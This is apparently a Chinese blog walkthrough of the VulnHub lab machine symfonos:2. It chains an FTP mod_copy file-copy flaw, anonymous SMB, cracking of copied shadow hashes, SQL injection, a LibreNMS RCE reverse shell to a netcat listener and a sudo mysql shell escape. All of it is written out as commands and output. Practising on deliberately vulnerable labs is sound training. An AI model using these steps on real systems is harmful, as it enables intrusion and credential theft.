手機(jī)站首頁(yè)散文詩(shī)歌雜文隨筆日記小小說(shuō)

散文網(wǎng) » 科技 »學(xué)習(xí) » 【攻略鴨】symfonos 2_VulnHub靶機(jī)攻略

【攻略鴨】symfonos 2_VulnHub靶機(jī)攻略

2023-02-03 18:01 作者:攻略鴨 0人讀過(guò) | 我要投稿

本文內(nèi)容純屬虛構(gòu)，求關(guān)注點(diǎn)贊支持！

將靶機(jī)網(wǎng)絡(luò)連接設(shè)置成為NAT。

靶機(jī)IP地址：192.168.31.244

測(cè)試機(jī)IP地址：192.168.31.37

外部信息收集

訪問(wèn)http://192.168.31.145/只顯示了一個(gè)圖片。

端口掃描

PORT ? ?STATE SERVICE ? ? REASON ? ? ? ? VERSION
21/tcp ?open ?ftp ? ? ? ? syn-ack ttl 64 ProFTPD 1.3.5
22/tcp ?open ?ssh ? ? ? ? syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp ?open ?http ? ? ? ?syn-ack ttl 64 WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ ?Supported Methods: GET HEAD
139/tcp open ?netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open ?netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m50s, median: 0s
| smb-security-mode:
| ? account_used: guest

137/udp ? open ? netbios-ns
161/udp ? open ? snmp

網(wǎng)站目錄枚舉

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.244/FUZZ
沒(méi)結(jié)果

SMB空口令登錄

smb://192.168.31.244/anonymous/backups/log.txt 查看內(nèi)容:

root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous]
? path = /home/aeolus/share
? browseable = yes
? read only = yes
? guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# Set the user and group under which the server will run.
User ? ?aeolus
Group ? ?aeolus
<Anonymous ~ftp>
?User ? ?ftp
?Group ? ?ftp

（此處應(yīng)當(dāng)對(duì)aeolus和ftp進(jìn)行SSH和FTP服務(wù)的口令枚舉）

FTP服務(wù)檢測(cè)

21端口匿名訪問(wèn)失敗

$ searchsploit ProFTPD
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? | linux/remote/36742.txt

$ searchsploit -m 36742.txt
失敗

$ searchsploit -m 49908.py
Exploit Completed
[!] Something Went Wrong
[!] Directory might not be writable

$ searchsploit -m 36803.py
$ python2 36803.py 192.168.31.244 /var/www/html id
[ - ] Error : 404 [ - ]

$ searchsploit -m 37262.rb
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure copying PHP payload to website path, directory not writable?

以上問(wèn)題出在網(wǎng)站目錄不可寫(xiě)入，其他可寫(xiě)入目錄需要想辦法讀取。

利用ProFTPd文件復(fù)制漏洞

想起了SMB空口令登錄可訪問(wèn)的共享文件夾/home/aeolus/share

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /home/aeolus/share
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > exploit
[*] 192.168.31.244:80 - 192.168.31.244:21 - Sending copy commands to FTP server
[*] 192.168.31.244:80 - Executing PHP payload /8N231L.php
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure executing payload

訪問(wèn)smb://192.168.31.244/anonymous/發(fā)現(xiàn)文件/8N231L.php已經(jīng)寫(xiě)入。

重新使用36742.txt，利用ProFTPd文件復(fù)制漏洞將靶機(jī)哈希文件復(fù)制到/home/aeolus/share：

$ ftp
ftp> o
(to) 192.168.31.244
Connected to 192.168.31.244.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.31.244]
Name (192.168.31.244:kali):
331 Password required for kali
Password:
530 Login incorrect.
ftp: Login failed
site cpfr /etc/passwd
site cpto /home/aeolus/share/passwd.copy

ftp> site cpfr /etc/shadow
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
550 cpto: Permission denied
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
250 Copy successful

通過(guò)SMB空口令訪問(wèn)導(dǎo)出的哈希文件：

smb://192.168.31.244/anonymous/passwd.copy
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:

smb://192.168.31.244/anonymous/shadow.copy
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
librenms:!:18095::::::

查了下LibreNMS，是開(kāi)源的SNMP設(shè)備監(jiān)控程序

使用john破解口令：

$ unshadow passwd.copy shadow.copy > unshadowed.txt

刪去無(wú)用的用戶信息。

$ john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
sergioteamo ? ? ?(aeolus)

$ ssh aeolus@192.168.31.244
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

權(quán)限提升

內(nèi)核提權(quán)

$ searchsploit Linux Kernel 4.9
未找到合適的提權(quán)漏洞。
aeolus@symfonos2:/tmp$ gcc CVE-2019-13272.c -o exp
aeolus@symfonos2:/tmp$ ./exp
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[-] Could not find pkexec executable at /usr/bin/pkexec

aeolus用戶sudo提權(quán)

$ sudo -V
Sudo version 1.8.19p1
aeolus@symfonos2:/tmp$ sudo -u#-1 /bin/bash
[sudo] password for aeolus:
aeolus is not in the sudoers file.

查看端口信息

tcp ? ?LISTEN ? ? 0 ? ? ?80 ? ? 127.0.0.1:3306 ? ? ? ? ? ? ? ? ?*:*
tcp ? ?LISTEN ? ? 0 ? ? ?50 ? ? ? ?*:139 ? ? ? ? ? ? ? ? ? *:*
tcp ? ?LISTEN ? ? 0 ? ? ?128 ? ?127.0.0.1:8080 ? ? ? ? ? ? ? ? ?*:*
tcp ? ?LISTEN ? ? 0 ? ? ?32 ? ? ? ?*:21 ? ? ? ? ? ? ? ? ? ?*:*
tcp ? ?LISTEN ? ? 0 ? ? ?128 ? ? ? *:22 ? ? ? ? ? ? ? ? ? ?*:*
tcp ? ?LISTEN ? ? 0 ? ? ?20 ? ? 127.0.0.1:25 ? ? ? ? ? ? ? ? ? ?*:*
tcp ? ?LISTEN ? ? 0 ? ? ?50 ? ? ? ?*:445 ? ? ? ? ? ? ? ? ? *:*
tcp ? ?LISTEN ? ? 0 ? ? ?50 ? ? ? :::139 ? ? ? ? ? ? ? ? ?:::*
tcp ? ?LISTEN ? ? 0 ? ? ?64 ? ? ? :::80 ? ? ? ? ? ? ? ? ? :::*
tcp ? ?LISTEN ? ? 0 ? ? ?128 ? ? ?:::22 ? ? ? ? ? ? ? ? ? :::*
tcp ? ?LISTEN ? ? 0 ? ? ?20 ? ? ?::1:25 ? ? ? ? ? ? ? ? ? :::*
tcp ? ?LISTEN ? ? 0 ? ? ?50 ? ? ? :::445 ? ? ? ? ? ? ? ? ?:::*

僅能本地訪問(wèn)127.0.0.1:8080

SSH本地端口轉(zhuǎn)發(fā)

┌──(kali)-[~/pentest]
└─$ ssh -N -f -L 8999:127.0.0.1:8080 aeolus@192.168.31.244
aeolus@192.168.31.244's password:
┌──(kali)-[~/pentest]
└─$ firefox http://127.0.0.1:8999

http://127.0.0.1:8999/login是LibreNMS登錄頁(yè)面。

LibreNMS漏洞利用

$ searchsploit -m 48453.txt
需要LibreNMS用戶登錄
http://127.0.0.1:8999/ajax_search.php?search=%27&type=group
存在SQL注入點(diǎn)
sqlmap -u "127.0.0.1:8999/ajax_search.php?search=1*&type=group" --cookie="PHPSESSID=tbvducu8v4cvcrko7cllj1ika6; XSRF-TOKEN=eyJpdiI6Im1UcnZ3ZE11a2VpOU8ycnhNdFFYb3c9PSIsInZhbHVlIjoieldlMGZuSzJvenlrZkZoZTJaVTQ5cCtiU1FoZGhRbVpxSDNBN0NYSDc3VEcrMjQzVlJBUzJpN3RrSUlLVTQ5OStxMlhzZm8zQytpRjV4dktGbjhWRHc9PSIsIm1hYyI6IjA0MjBiOTJlNGEwNzgxYTVlYTcwMWE2ZjQzOTM4NWJmZjBmZTI5MWYxZmIyNjMwN2YzMzAzODlkNzg1YzEzOWIifQ%3D%3D; librenms_session=eyJpdiI6InYxXC9uK0owOGs1SCtIdTBWN0xncU5BPT0iLCJ2YWx1ZSI6IitoWUhSQjBcL25pQytXbmNzcEI1NmNKWHRLd1k1OFh5ME8zOXZpTXhOTkRWY0lLVElEaWpZQlVrQmtqdCtMeUZNXC94c1JoZVcycThGa1VTVzRPYWF3WlE9PSIsIm1hYyI6IjUwYzAxYmJkOTE4NzMwYWUyNzdlZmJjYjdlMDRjNDNmNThkMGI0N2MyOWM1MTM0NTdkZDY0ZGJiMDNkNWMwZTYifQ%3D%3D" --batch --dbs
available databases [2]:
[*] information_schema
[*] librenms

$ searchsploit -m 47044.py
CVE-2018-20434 LibreNMS 1.46 - 'addhost' RCE漏洞
漏洞觸發(fā)在LibreNMS 1.46及之前版本中的capture.inc.php文件，需要LibreNMS用戶登錄。

測(cè)試用aeolus:sergioteamo登錄http://127.0.0.1:8999 跳轉(zhuǎn)至http://127.0.0.1:8999/addhost獲取到cookie。

$ nc -nvlp 5433
$ python2 47044.py http://127.0.0.1:8999 "PHPSESSID=3t1mq50uvdkdt0qg04atr1pl02; XSRF-TOKEN=eyJpdiI6ImNcL0lPcXhKOFwvWFdzbnBNZG9xSFREQT09IiwidmFsdWUiOiJDc01rXC9uRHhDcnF3SSsrV0hpQURqQzR3RjkwVVgyTDlpZlE5bWNuNzhGK1NqOWpvaWdzK2R1MHB0WEZIYVRaTGVwNWgwakNrWHF4ZlwvSHprRCtWQVBBPT0iLCJtYWMiOiJlOTAwNTA1OGUzMTBkM2RiMDZkZWRjNjUxOWQ5NzBhNmFkN2QxNzRkMTc1ZWZkOTEzMWExZTdhNDcwNWY2MTMyIn0%3D; librenms_session=eyJpdiI6IlNxYyt0eEFXVDcrUTRcLzZjdlgxU3Z3PT0iLCJ2YWx1ZSI6InNlZFwvUkhicHN6d1dWMEVGK0JMbThZcTFWSnZOQjBmUVhMRWxoTUE2Sk83K1NaN09tTktYamFHNGlVcGJwWElVcEdxVUdHeVdUSVlmWUxCbEVzK2xqZz09IiwibWFjIjoiZmRhYTBmZTc0YzY2ODFkMWYxYjAzNDQyOGY3Yjk5NGJmM2JkMjNhZjZiYWQyOTY1OGExODc3ODVkZDA3ZjRiZSJ9" 192.168.31.37 5433
[+] Device Created Sucssfully

查看反彈shell：

$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)

sudo提權(quán)

$ sudo -l
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
$ sudo mysql -e '\! /bin/sh'
id
uid=0(root) gid=0(root) groups=0(root)

其他

flag

cat /root/proof.txt
Congrats on rooting symfonos:2!

標(biāo)簽：